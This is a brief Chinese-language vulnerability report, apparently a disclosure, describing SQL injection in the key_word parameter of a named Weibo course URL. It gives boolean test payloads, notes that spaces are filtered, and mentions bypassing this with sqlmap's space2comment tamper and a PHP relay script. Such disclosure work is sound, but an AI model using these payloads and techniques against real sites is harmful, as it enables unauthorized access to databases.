URL:http://xueyuan.weibo.com/course/index?key_word=1
key_word参数存在注入
http://xueyuan.weibo.com/course/index?key_word=1%'and'%'='
正常
http://xueyuan.weibo.com/course/index?key_word=1%'and'%'='1
异常
过滤了空格
SQLMAP 加入space2comment tamper后 只识别出time盲注 竟然没有识别出bool盲注
定义--string关键字 添加前后缀 等依然不行
真是日了狗了,于是php写个中转脚本
然后再次测试sqlmap成功